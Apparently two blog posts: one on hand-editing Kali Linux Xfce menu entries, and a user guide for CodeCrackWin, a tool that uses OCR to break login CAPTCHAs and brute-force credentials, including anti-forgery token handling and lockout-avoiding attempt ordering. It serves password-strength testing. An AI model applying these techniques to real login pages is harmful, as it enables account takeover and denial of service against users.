<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLU6AtCaGhrmspCbShW5fP-fUaitVZQP-8QgbCH3rGOhaVL4JiQY7U_2hsV8WSlMO9d0uT8SrLBdphnkkHqDAHS5QSsrYcGMEcq2uTGSs-FF4cQuKbLcOWuHo5FI_cMH-qBJmLCPk0l0K/s629/Fig_07-14.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="629" data-original-width="578" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLU6AtCaGhrmspCbShW5fP-fUaitVZQP-8QgbCH3rGOhaVL4JiQY7U_2hsV8WSlMO9d0uT8SrLBdphnkkHqDAHS5QSsrYcGMEcq2uTGSs-FF4cQuKbLcOWuHo5FI_cMH-qBJmLCPk0l0K/s400/Fig_07-14.PNG" /></a></div>
</div>
<p style="font-size: 16pt;"><b>Customizing the items (members) of the Kali Applications Menu</b></p>
<p>Published 2021-09-08T11:28:00.001+08:00, updated 2021-09-08T11:29:40.196+08:00</p>
<div style="border: 3px solid rgb(234, 193, 23); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">Kali used to ship the Gnome desktop, where the Applications Menu could be edited with the Alacarte tool. After the switch to the Xfce desktop, Alacarte can still be installed, but it can only edit the properties of existing items and cannot add new ones.</p>
<p style="margin-bottom: 8px; text-indent: 2em;">The Xfce menu editor recommended online is <span style="color: #2b00fe;"><b>menulibre</b></span>, but on its first run after installation it reported "<span style="color: red;">MenuLibre cannot be run as root.</span>" It cannot be run as root, and I happen to be used to operating Kali as root.</p><p style="margin-bottom: 8px; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWDHckXyVHmxqt8hWUj-JQUYVJwJnkI407wkeZANPM3jJasM7PxsH92ngvdlXYBFkDnMZrC9btneRA4FINS2sv4poq2Gv5nFTWKguN78h4xIby7EO_siIjecrOstGe2o0n6DPoJRv6-ncZ/s551/kali-001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="551" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWDHckXyVHmxqt8hWUj-JQUYVJwJnkI407wkeZANPM3jJasM7PxsH92ngvdlXYBFkDnMZrC9btneRA4FINS2sv4poq2Gv5nFTWKguN78h4xIby7EO_siIjecrOstGe2o0n6DPoJRv6-ncZ/w400-h105/kali-001.PNG" width="400" /></a></div><p></p><p style="margin-bottom: 8px; text-indent: 2em;">So I created another account and ran "<b> su - kali -c menulibre</b>", which produced a different error:</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 10pt; line-height: 100%; padding: 4px;">
<span style="color: red;">root@kali-2020-3</span>:<span style="color: #2b00fe;"><span style="color: #3d85c6;">~</span>#</span> su - kali -c menulibre<br />
┏━(Message from Kali developers)<br />
┃<br />
┃ We have kept /usr/bin/python pointing to Python 2 for backwards<br />
┃ compatibility. Learn how to change this and avoid this message:<br />
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/<br />
┃<br />
┗━(<span style="color: #b45f06;">Run: “touch ~/.hushlogin” to hide this message</span>)<br />
Unable to init server: Could not connect: Connection refused<br />
Unable to init server: 無法連接:Connection refused<br />
<br />
(menulibre:4377): Gtk-CRITICAL **: 08:10:06.059: gtk_icon_theme_get_for_screen: assertion 'GDK_IS_SCREEN (screen)' failed<br />
No menu prefix found, MenuLibre will not function properly.<br />
Unable to init server: 無法連接:Connection refused<br />
<br />
(menulibre:4377): Gtk-WARNING **: 08:10:06.082: cannot open display: </div>
<p>I really did not want to spend much time on a feature I use only occasionally, so in the end I removed menulibre.</p>
<hr />
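<p style="margin-bottom: 8px; text-indent: 2em;"><b>Why edit the menu at all?</b> After installing a new tool and not using it for a while, I often forget its name. If the tool is placed in the menu, I will probably still remember what type of tool it is even when the name escapes me, which makes it easier to find there.</p>
<p style="margin-bottom: 8px; text-indent: 2em;">Since neither Alacarte nor menulibre will do, let's <b>edit by hand</b> instead; it is only needed once in a while anyway.</p>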
<div style="background-color: #f8b5af; border: 2px solid rgb(248, 27, 5); padding: 4px;">
<p style="margin-left: 3em; text-indent: -3em;">
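<span style="color: #cc0000;"><b>Note:</b></span><b> This is neither the standard nor a precise way of doing it; it just happens to meet the need of adding new items to the Applications Menu.</b></p></div>
<p style="margin-bottom: 8px; text-indent: 2em;">First, the Xfce menu items are stored in the "<span style="color: #0b84da;">/usr/share/kali-menu/applications/</span>" directory, and each item has the file extension "<span style="color: #38761d;">.desktop</span>". Taking "Kali-nmap.desktop" as an example, its contents are:</p>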
<div style="border: 2px solid rgb(100, 237, 108); padding: 6px;">
[Desktop Entry]<br />
Name=nmap<br />
Encoding=UTF-8<br />
Exec=/usr/share/kali-menu/exec-in-shell "nmap"<br />
Icon=kali-nmap<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=01-info-gathering;01-04-network-scanners;02-vulnerability-analysis;<br />
X-Kali-Package=nmap</div>
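<p style="margin-bottom: 8px; text-indent: 2em;">This is a <b>relatively simple</b> item. More complex ones exist, but this simple example already meets my needs. To add a new item, just copy Kali-nmap.desktop and modify it, for example to add a vega entry:</p>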
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;"><span style="color: #0b5394;">cp Kali-nmap.desktop vega.desktop</span></div>
<p>Then edit vega.desktop as follows:</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
[Desktop Entry]<br />
Name=<b><span style="color: #cc0000;">vega</span></b><br />
Encoding=UTF-8<br />
Exec=<b><span style="color: #cc0000;">vega</span></b><br />
Icon=<b><span style="color: #cc0000;">kali-menu</span></b><br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=<b><span style="color: #cc0000;">01-info-gathering;03-05-web-vulnerability-scanners;</span></b><br />
X-Kali-Package=<b><span style="color: #cc0000;">vega</span></b></div>
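<p style="margin-bottom: 8px; text-indent: 2em;">The main changes are shown in <b><span style="color: #cc0000;">bold red</span></b>. <b><span style="background-color: #fcff01;">Next, copy this file to "<span style="color: #3d85c6;">/usr/share/applications/</span>"</span></b>, and the menu item has been added; the vega entry circled in yellow in the figure below is the one I added to the menu by hand. Naturally, deleting the file removes the menu item.</p>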
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqG6Y1TRJhPGIoqg1tJqBBMITvdPSytCukaXV2fYp4CdK1MaWb5o1jnBCXVLJfFqqvS9CDYsi5A-GAOaySlE_Zxw6SD7o6kdhw48rPnBWX6xxcV4dSe8cC3ibHgEsSjTreUImLAz5mAzn/s623/kali-004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="579" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqG6Y1TRJhPGIoqg1tJqBBMITvdPSytCukaXV2fYp4CdK1MaWb5o1jnBCXVLJfFqqvS9CDYsi5A-GAOaySlE_Zxw6SD7o6kdhw48rPnBWX6xxcV4dSe8cC3ibHgEsSjTreUImLAz5mAzn/w371-h400/kali-004.PNG" width="371" /></a></div>
<p><b><span style="color: #990000;">Once again, this is not the standard way; it just happens to meet the need to add, delete and modify menu items.</span></b></p>
<p style="font-size: 16pt;"><b>File contents explained</b></p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
[Desktop Entry] <span style="color: #38761d;"># Section name; do not modify</span><br />
Version=1.0 <span style="color: #38761d;"># Version number</span><br />
Name=<span style="color: #990000;">vega</span> <span style="color: #38761d;"># Displayed name, used for all locales; <span style="color: #990000;">must be changed</span></span><br />
Comment=Web vulnerability Scanner <span style="color: #38761d;"># Tooltip text that pops up when the mouse hovers over the item, used for all locales</span><br />
Name[zh_CN]=vega扫描 <span style="color: #38761d;"># <span style="color: #cc0000;">zh_CN</span>: name displayed when the operating system uses the <span style="color: #cc0000;">Simplified Chinese</span> locale</span><br />
Comment[zh_CN]=Web漏洞扫描工具 <span style="color: #38761d;"># <span style="color: #cc0000;">zh_CN</span>: tooltip text displayed when the operating system uses the <span style="color: #cc0000;">Simplified Chinese</span> locale</span><br />
Name[zh_TW]=vega掃描 <span style="color: #38761d;"># <span style="color: #cc0000;">zh_TW</span>: name displayed when the operating system uses the <span style="color: #cc0000;">Traditional Chinese</span> locale</span><br />
Comment[zh_TW]=Web漏洞掃描工具 <span style="color: #38761d;"># <span style="color: #cc0000;">zh_TW</span>: tooltip text displayed when the operating system uses the <span style="color: #cc0000;">Traditional Chinese</span> locale</span><br />
Encoding=UTF-8 <span style="color: #38761d;"># Encoding</span><br />
Type=Application <span style="color: #38761d;"># Type: Application or Link</span><br />
Exec=vega <span style="color: #38761d;"># Command to run when this item is selected, as if typed manually in a terminal</span><br />
Icon=<span style="color: #990000;">kali-menu</span> <span style="color: #38761d;"># Icon of this menu item; see the "<b>Source of the Icon</b>" section below</span><br />
StartupNotify=false <span style="color: #38761d;"># Whether to show a notification window at startup; just set it to false</span><br />
Terminal=true <span style="color: #38761d;"># ?? Not sure; set to true as in the example</span><br />
Categories=<span style="color: #990000;">02-vulnerability-analysis; </span> <span style="color: #38761d;"> # Which menu category to place the item under; separate multiple categories with ";". For how to find category names, see the "<b>Source of category names</b>" section below</span><br />
X-Kali-Package=<span style="color: #990000;">vega</span> <span style="color: #38761d;"># Package name in Kali</span> </div>
<p style="margin-bottom: 8px; text-indent: 2em;">Besides <span style="color: #2b00fe;">Type=Application</span>, which runs a command through Exec, "<span style="color: #2b00fe;">Type=Link</span>" lets you specify with "<span style="color: #2b00fe;">URL=&lt;URL&gt;</span>" an address to be opened by the default browser.</p>
<p style="margin-bottom: 8px; text-indent: 2em;">If you <b>want the application to run inside a terminal</b>, change the value of <span style="color: #2b00fe;">Exec</span> as follows. The first part, "<span style="color: #2b00fe;">/usr/share/kali-menu/exec-in-shell</span>", launches the operating system's terminal; the second part, "<span style="color: #cc0000;">"hydra -h"</span>", is the command to run in that terminal together with the arguments passed to it.</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">Exec=<span style="color: #2b00fe;">/usr/share/kali-menu/exec-in-shell</span> "<span style="color: #cc0000;">hydra -h</span>"</div>
<p><br /></p>
<p style="font-size: 16pt;"><b>Source of the Icon</b></p>
<p style="margin-bottom: 8px; text-indent: 2em;">The Icon parameter in the entry <b>only needs the icon name</b>; the system looks up the icon file of the same name under "<span style="color: #3d85c6;">/usr/share/icons/hicolor/<span style="color: #cc0000;">DxD</span>/apps/</span>". In the example above, "<span style="color: #3d85c6;">kali-menu</span>" refers to kali-menu.png. <span style="color: #cc0000;">DxD</span> in the path stands for the icon size; if you are curious, browse the "<span style="color: #3d85c6;">/usr/share/icons/hicolor/</span>" directory yourself.</p>
<p style="font-size: 16pt;"><b>Source of category names</b></p>
<p style="margin-bottom: 8px; text-indent: 2em;">Category names can be looked up in the contents of existing menu items. For example, to place a custom menu item under "<span style="color: #990000;">Bluetooth Tools</span>" in "<span style="color: #990000;">06-Wireless Attacks</span>", run "<span style="color: #0b5394;">cat kali-btscanner.desktop</span>" and you will find that the category name is "<span style="color: #990000;"><b>06-02-bluetooth-tools</b></span>".</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
<span style="color: red;">root@kali-2019-3</span>:<span style="color: #3d85c6;">/usr/share/applications</span># <b>cat kali-btscanner.desktop</b> <br />
[Desktop Entry]<br />
Name=btscanner<br />
Encoding=UTF-8<br />
Exec=/usr/share/kali-menu/exec-in-shell "btscanner -h"<br />
Icon=kali-menu<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=<span style="background-color: #b6d7a8;"><span style="color: #cc0000;">06-02-bluetooth-tools;</span></span><br />
X-Kali-Package=btscanner<br />
</div>
<hr />
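<p>Don't ask me how to add a new category folder; I have not found the answer yet. If anyone knows, please tell me. Thanks!</p>
</div>
<p style="font-size: 16pt;"><b>CodeCrackWin version 3.0 (CAPTCHA brute-force tool) user guide</b></p>
<p>Published 2021-08-31T10:47:00.006+08:00, updated 2021-09-06T20:02:56.012+08:00</p>
<div style="border: 3px solid rgb(100, 149, 237); font-size: 14pt; line-height: 180%; padding: 8px;">
<p>Earlier versions used the WebBrowser component to handle requests and responses, which turned out not to handle Ajax and JSON correctly, so the tool was rewritten. WebBrowser still loads the first page in order to obtain the login fields and the CAPTCHA image, while the brute-force testing is now handled by HttpWebRequest to solve the problems encountered in the previous version.<br /></p>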
<div style="background-color: #fadbd8; border: 2px solid rgb(51, 255, 51); line-height: 100%; margin: 4px; padding: 4px;">
<p>Executable download: <a href="https://drive.google.com/file/d/17x_CqgwkfjI-YgT3UZxsLtYM6EMMDn_Z/view?usp=sharing">CodeCrackWin.ZIP</a> (remember to adjust the configuration file CodeCrackWin.config)</p>
<p>Source code download: <a href="https://drive.google.com/file/d/1u5gxGqqUpZPjok-E6BEpjouQfndYOQG5/view?usp=sharing">CodeCrackWin-source.ZIP</a> (this project was developed with Visual Studio 2013)</p>
<p>Sample web page: <a href="https://drive.google.com/file/d/1OTqu8KoeJ3zXr3vsOxNc0gAJOeTg4N-9/view?usp=sharing">CodeCrackDemo.ZIP</a> (host it on IIS yourself)</p>
</div>
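<div style="color: #990000; font-size: 14pt; font-weight: bold;">I. Foreword</div>
<div style="margin-left: 2em;">CodeCrackWin is built on .NET 3.5 and written in C#; its main OCR component is the tessdata 4 library. The program is entry-level and probably leaves many situations unconsidered, so <span style="color: #660000; font-weight: bold;">the misrecognition rate may be far from low and the range of CAPTCHAs it can handle is limited</span>. It was originally developed only to test whether users use weak passwords, but software always has to start with a first version. If it does not meet your needs, simply remove it.</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">II. Installing CodeCrackWin</div>
<div style="margin-left: 2em;">CodeCrackWin is developed as <span style="color: #38761d; font-weight: bold;">portable software</span>: no installation is required, but the configuration file must be adjusted to the directory where the program is stored.</div>
<div style="margin-left: 2em;">Modify CodeCrackWin.exe.config</div>
<div style="margin-left: 3em; text-indent: -1em;">1.<span style="color: blue; font-weight: bold;">Settings in the &lt;appSettings&gt; section</span></div>
<div style="margin-left: 3em;"><span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span>: OCR will only consider these characters. The more characters the CAPTCHA uses, the lower this program's recognition rate. By default only digits and uppercase letters are used; if the website to be cracked also uses lowercase letters, add them to this setting's value. If the site's CAPTCHA contains only digits, set this parameter to "0123456789" to improve the recognition rate.</div>
<div style="border: 1pt solid green; margin-left: 3em; padding: 2pt;">The "<span style="color: #990000; font-weight: bold;">OCR characters (OCR字元)</span>" field in the program serves the same purpose as <span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span>, except that "OCR characters" applies to a specific website (written in the configuration file). At run time, if "OCR characters" has a value, it takes precedence; if "<span style="color: #990000; font-weight: bold;">OCR characters</span>" is empty, the contents of <span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span> are used.</div>
<div style="margin-left: 3em;"><span style="color: #990000; font-weight: bold;">timer_tick</span>: sets the interval between attempts, in milliseconds; for example, 3000 means that one account/password pair is tried every three seconds.</div>
<div style="margin-left: 3em; text-indent: -1em;">2.
<span style="color: blue; font-weight: bold;">The &lt;userSettings&gt; &gt; &lt;TesseractOCR.Properties.Settings&gt; section</span></div>
<div style="margin-left: 3em;">
The <span style="color: #990000; font-weight: bold;">&lt;value&gt;</span> of TessdataPath specifies the templates used for OCR recognition. If it is set incorrectly, the program hangs at run time. The path must point to the tessdata directory under the program's installation location, which in this example should be D:\CodeCrack\tessdata. (The figure above shows my test environment, whose path differs from the one described in this paragraph.)</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">III. First run</div>
<div style="margin-left: 2em;">To run the program, just double-click "CodeCrackWin.exe". The initial screen is shown below (some values are pre-filled only to show the format of each field). It is somewhat complex, and using it takes a bit of know-how.</div>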
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFGtfzbhElWOy7n20zoIbCEN7tuHnUM3g9Sq-CtFKNjRSqZYXum2o5ZW8DvqJYyUr8NpbrLhpeEvTOen_UG_CiJnKImK9fxui7H61qHAUvVkpTdjAVfUbpCLueIqxeWHceBcYM_Ew7GFR/s1253/Pic01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1253" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFGtfzbhElWOy7n20zoIbCEN7tuHnUM3g9Sq-CtFKNjRSqZYXum2o5ZW8DvqJYyUr8NpbrLhpeEvTOen_UG_CiJnKImK9fxui7H61qHAUvVkpTdjAVfUbpCLueIqxeWHceBcYM_Ew7GFR/w400-h254/Pic01.png" width="400" /></a></div>
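<div style="margin-left: 3em;">The program's fields are described below (the <span style="color: red; font-weight: bold;">numbers</span> on the screenshot correspond to the <span style="color: red; font-weight: bold;">item numbers</span> below):</div>
<div style="margin-left: 3em; text-indent: -1em;">1.<span style="color: #990000; font-weight: bold;">URL</span>: the address of the page where the user enters the account and password, normally the system's <span style="color: red; font-weight: bold;">login page</span>. The full URL is required. If the actual login page is embedded in a frame (or iframe), specify the URL of the real login page, not that of the outer page that lays out the frame.</div>
<div style="margin-left: 3em; text-indent: -1em;">2.<span style="color: #990000; font-weight: bold;">Account field</span>: the name or id attribute value of the field on the <span style="color: red; font-weight: bold;">login page</span> used to enter the account. For example, if the field's HTML is &lt;input type="text" name="<span style="color: #cc0000;">account</span>" id="account-id"&gt;, enter "<span style="color: #cc0000;">account</span>" here; if there is no name attribute, enter the id value "account-id".</div>
<div style="margin-left: 3em; text-indent: -1em;">3.<span style="color: #990000; font-weight: bold;">Password field</span>: the name attribute value of the field on the <span style="color: red; font-weight: bold;">login page</span> used to enter the password. For example, if the field's HTML is &lt;input type="password" name="<span style="color: #cc0000;">pwd</span>" id="pwd-id"&gt;, enter "<span style="color: #cc0000;">pwd</span>" here; if there is no name attribute, enter the id value "<span style="color: #cc0000;">pwd-id</span>".</div>
<div style="margin-left: 3em; text-indent: -1em;">4.<span style="color: #990000; font-weight: bold;">CAPTCHA field</span>: the name attribute value of the field on the <span style="color: red; font-weight: bold;">login page</span> used to enter the CAPTCHA code; if there is no name attribute, enter the id value.</div>
<div style="margin-left: 3em; text-indent: -1em;">5.<span style="color: #990000; font-weight: bold;">TagName of the image element</span>: because applications can serve the image in different ways, the tool must know whether it uses img or input. For example, if the HTML is &lt;<span style="color: #cc0000;">IMG </span>id=loginImg src="../VerifyCodeServlet?t=login"&gt;, enter "<span style="color: #cc0000;">img</span>" here. If it uses &lt;<span style="color: blue;">input </span>name="ImageButton1" src="ValidateCode.aspx"&gt;, enter "<span style="color: blue;">input</span>". The type must be correct, otherwise the image will not be found.</div>
<div style="margin-left: 3em; text-indent: -1em;">6.<span style="color: #990000; font-weight: bold;">CAPTCHA source</span>: a keyword used to identify the CAPTCHA image element; the program relies on this text to decide which element is the image. Using the example from <span style="color: #990000; font-weight: bold;">item 5</span>, the image element's HTML is &lt;IMG id=loginImg src="../VerifyCodeServlet?t=login"&gt;, so this field can be "<span style="color: red;">VerifyCodeServlet?t=login</span>" or "<span style="color: red;">VerifyCodeServlet?</span>".</div>
<div style="margin-left: 3em; text-indent: -1em;">7.<span style="color: #990000; font-weight: bold;">Image coordinate adjustment</span>: the program's automatic detection of the image position is sometimes slightly off, and this field allows fine adjustment, in pixels. Some CAPTCHA images carry a border (part of the image itself) that makes the program misjudge the background color; in that case use the coordinate adjustment to skip the border. In the image below, the red border becomes nearly black after grayscale conversion, but the real background should be white. Because the border is 2 pixels wide, set x and y to 2 each. <span style="background: yellow none repeat scroll 0% 0%; color: #990000; font-weight: bold;">x is the horizontal coordinate</span>, which controls the vertical border line on the left of the image; <span style="background: yellow none repeat scroll 0% 0%; color: #990000; font-weight: bold;">y is the vertical coordinate</span>, which controls the horizontal border line on top of the image.<br />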
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjip69aAW1nWxAJtpl_ELcAZycAHIYQZ6FoD6maRgtnQrpypR53RNvHYSrT0mRISWyHPZXnqtIcofWxwDwjjS5QD5T65SxEHgXkjklxEWJbgZu9jcu-_LIxm7s8vjslMFCpEBUv7BHuDtCJ/s94/image003.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="36" data-original-width="94" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjip69aAW1nWxAJtpl_ELcAZycAHIYQZ6FoD6maRgtnQrpypR53RNvHYSrT0mRISWyHPZXnqtIcofWxwDwjjS5QD5T65SxEHgXkjklxEWJbgZu9jcu-_LIxm7s8vjslMFCpEBUv7BHuDtCJ/s0/image003.jpg" width="94" /></a></div>
</div>
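<div style="margin-left: 3em; text-indent: -1em;">8.<span style="color: #990000; font-weight: bold;">Remove 2nd noise</span> and <span style="color: #990000; font-weight: bold;">Remove 3rd noise</span>: options that strengthen the removal of noise dots from the image. Choose them according to the image quality; removing too much noise can also distort the image, so whether to enable them should depend on the actual result.</div>
<div style="margin-left: 3em; text-indent: -1em;">9.<span style="color: #990000; font-weight: bold;">No CAPTCHA used</span>: besides login pages with a CAPTCHA, the program also works on login pages without one. If the login page does not use a CAPTCHA, tick this box and the program skips image recognition. For login pages without a CAPTCHA, hydra is the better choice.</div>
<div style="margin-left: 3em; text-indent: -1em;">10.(<span style="color: #990000; font-weight: bold;">OCR result</span>): the OCR recognition result is shown here so that a person can judge whether recognition succeeded.</div>
<div style="margin-left: 3em; text-indent: -1em;">11.(<span style="color: #990000; font-weight: bold;">Grayscale value</span>): when you click the CAPTCHA image of item 31 with the mouse, the grayscale value of that pixel is shown here, as a reference for adjusting the noise-line lower and upper limits of items 24 and 25.</div>
<div style="margin-left: 3em; text-indent: -1em;">12. <span style="color: #990000; font-weight: bold;">Submit string</span>: the new version submits data with HttpWebRequest, so it needs to know the submission target and content.<br />
How do you find the submit string? Use the browser's developer tools to capture the traffic of a manual login, see how the account, password and CAPTCHA code are submitted to the back end at "login", and note the <span style="font-weight: bold;">submission target</span>, <span style="font-weight: bold;">submission method</span> and <span style="font-weight: bold;">submitted content</span>. The submit string is composed as <span style="color: #c00000; font-weight: bold;">&lt;submission target&gt;?&lt;submitted content&gt;</span>.<br />
For GET, the URL itself is the <span style="font-weight: bold;">submit string</span>; for POST, you must assemble it by hand.<br />
To submit data successfully, the <span style="font-weight: bold;">submit string</span> needs some reshaping. In the example in the figure below, the submit string obtained from the browser is "Account=<span style="color: red; font-weight: bold;">test</span>&amp;Password=<span style="color: red; font-weight: bold;">password</span>&amp;VarifyCode=<span style="color: red; font-weight: bold;">666666</span>&amp;AccountType=Student&amp;__RequestVerificationToken=<span style="color: red; font-weight: bold;">uar5cJQ4LbogTjPEp3dPJgcohYranexj7qfqSO4T_l-bgmJ9duY42rzCPTJxByMmY9Mu1PhWEulmZBunU7i5sRQJUa81</span>", where the parts in <span style="color: red; font-weight: bold;">red</span> are variable data; you must tell the tool which data to substitute for them.<br />
For example, test comes from the form's "Account" field, so "<span style="color: red; font-weight: bold;">test</span>" becomes "<span style="color: red; font-weight: bold;">^Account^</span>". Likewise, password becomes the name or id of the password field, that is, "<span style="color: red; font-weight: bold;">password</span>" becomes "<span style="color: red; font-weight: bold;">^Password^</span>". Some web systems dynamically insert anti-forgery tokens; as long as the token is placed in a form field (for example a hidden one), the same substitution lets the tool submit it automatically, for example "__RequestVerificationToken=<span style="color: red; font-weight: bold;">^__RequestVerificationToken^</span>". The tool then reads the value of __RequestVerificationToken from the form and submits the correct token value with the login request.</div>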
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP_aAGCs0HsCbz35kDOUZs1rbZzNF_1iuVDiICzxpDu0wChV9RWTwdil-aLRdAj6m9a-sl08OxO8CEHCGmPfgerG-h1-qRKNIXcC9Z5DcCEeqwlVnLyk8A7oa-RJAM4q0a2yf-dfIWxAO/s1320/Pic03.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="820" data-original-width="1320" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP_aAGCs0HsCbz35kDOUZs1rbZzNF_1iuVDiICzxpDu0wChV9RWTwdil-aLRdAj6m9a-sl08OxO8CEHCGmPfgerG-h1-qRKNIXcC9Z5DcCEeqwlVnLyk8A7oa-RJAM4q0a2yf-dfIWxAO/w400-h249/Pic03.PNG" width="400" /></a></div><br />
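<div style="margin-left: 3em; text-indent: -1em;">13. <span style="color: #990000; font-weight: bold;">Submit method</span>: see item 12; choose "GET" or "POST" according to the submission method.</div>
<div style="margin-left: 3em; text-indent: -1em;">14. <span style="color: #990000; font-weight: bold;">Data type</span>: see item 12; choose "URL format" or "JSON" according to the format of the submitted content.</div>
<div style="margin-left: 3em; text-indent: -1em;">15. <span style="color: #990000; font-weight: bold;">Redirect depth</span>: after the login data is submitted, the back end may redirect depending on the verification result. This setting tells the tool how many levels of redirects to examine; one level is one received 30x status code.</div>
<div style="margin-left: 3em; text-indent: -1em;">16.<span style="color: #990000; font-weight: bold;">Account file</span>, <span style="color: #990000; font-weight: bold;">Load accounts</span>, <span style="color: #990000; font-weight: bold;">Single account</span>: these three work together. If <span style="color: blue; font-weight: bold;">Single account</span> is ticked, the content of <span style="color: #0000cc; font-weight: bold;">Account file</span> is a single account. For example, to try cracking only the password of the admin account, tick <span style="color: blue; font-weight: bold;">Single account</span> and enter "admin" in <span style="color: #0000cc; font-weight: bold;">Account file</span>. If <span style="color: blue; font-weight: bold;">Single account</span> is not ticked, use the <span style="color: #0000cc; font-weight: bold;">Load accounts</span> button to choose a dictionary file and load the list of accounts to test. After loading, the number of valid accounts appears to the right of the button text; for example, loading 5 accounts changes the button text from "Load accounts" to "Load accounts (5)", and the <span style="color: #0000cc; font-weight: bold;">Account file</span> field then holds the path of the account dictionary file.</div>
<div style="margin-left: 3em; text-indent: -1em;">17.<span style="color: #990000; font-weight: bold;">Password file</span>, <span style="color: #990000; font-weight: bold;">Load passwords</span>, <span style="color: #990000; font-weight: bold;">Single password</span>: these three work together. If <span style="color: blue; font-weight: bold;">Single password</span> is ticked, the content of <span style="color: #0000cc; font-weight: bold;">Password file</span> is a single password. For example, to try only the password "password", tick <span style="color: blue; font-weight: bold;">Single password</span> and enter "password" in <span style="color: blue; font-weight: bold;">Password file</span>. If <span style="color: blue; font-weight: bold;">Single password</span> is not ticked, use the <span style="color: #0000cc; font-weight: bold;">Load passwords</span> button to choose a dictionary file and load the list of passwords to test. After loading, the number of valid passwords appears to the right of the button text; for example, loading 5 passwords changes the button text from "Load passwords" to "Load passwords (5)", and the <span style="color: blue; font-weight: bold;">Password file</span> field then holds the path of the password dictionary file.</div>
<div style="margin-left: 3em; text-indent: -1em;">18.<span style="color: #990000; font-weight: bold;">Credential mode</span>: in a brute-force run, the <span style="color: red; font-weight: bold;">default</span><span style="color: red;"> (</span>that is, <span style="font-weight: bold;">nothing ticked</span><span style="color: red;">)</span> is to pick one account, test every password against it (password first), and then move to the next account. This approach is likely to get users' accounts locked (a form of DoS attack). The tool offers three other modes:<br /><span style="color: #00b050; font-weight: bold;">Account first</span>: some systems unlock automatically after a period of time (such as 30 minutes). In that case the <span style="color: #00b050; font-weight: bold;">account first</span> strategy can be used: pick one password, try it against every account, then pick the next password, which lengthens the interval between attempts on each account.<br />
<span style="color: black;">Account and password in step</span>: the account list and the password list advance together, and testing stops as soon as either list is exhausted.<br />
<span style="color: #c00000; font-weight: bold;">Account only</span>: fills the content of the account list into both the account field and the password field. It is generally used when the login page has only an account field and no password field (in that case the password field of item 3 can be given any name).</div>
<div style="margin-left: 3em; text-indent: -1em;">19. <span style="color: #990000; font-weight: bold;">Login-<u>failure</u> message</span>/<span style="color: #990000; font-weight: bold;">Login-<u>success</u> message</span>: the string used to decide whether the credentials are correct. If <span style="color: blue; font-weight: bold;">not ticked</span>, a response that contains the specified string is treated as a failed login; if <span style="color: blue; font-weight: bold;">ticked</span>, a response that contains the specified string is treated as a successful login. (See item 20.)</div>
<div style="margin-left: 3em; text-indent: -1em;">20. (<span style="color: #990000; font-weight: bold;">Text for judging the login result</span>): used together with the setting of item 19, this is the response text that indicates login success or failure. The string checked here is not necessarily text displayed on the page; analyze carefully what differs between a successful and a failed response.</div>
<div style="margin-left: 3em; text-indent: -1em;">21.<span style="color: #990000; font-weight: bold;">CAPTCHA-error message</span>: the message the server returns when the CAPTCHA code is wrong; the program uses this text to decide whether the code it entered was correct.</div>
<div style="margin-left: 3em; text-indent: -1em;">22.<span style="color: #990000; font-weight: bold;">Account-locked message</span>: the message the server returns when an account is locked; the program uses this text to decide whether the account has been locked, and a locked account is not tried again.</div>
<div style="margin-left: 3em; text-indent: -1em;">23.<span style="color: #990000; font-weight: bold;">OCR characters</span>: sets the range of characters OCR recognizes. If the CAPTCHA contains only digits, enter "0123456789"; if it contains uppercase letters, lowercase letters and digits, enter "<span style="color: #c00000;">0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz</span>".</div>
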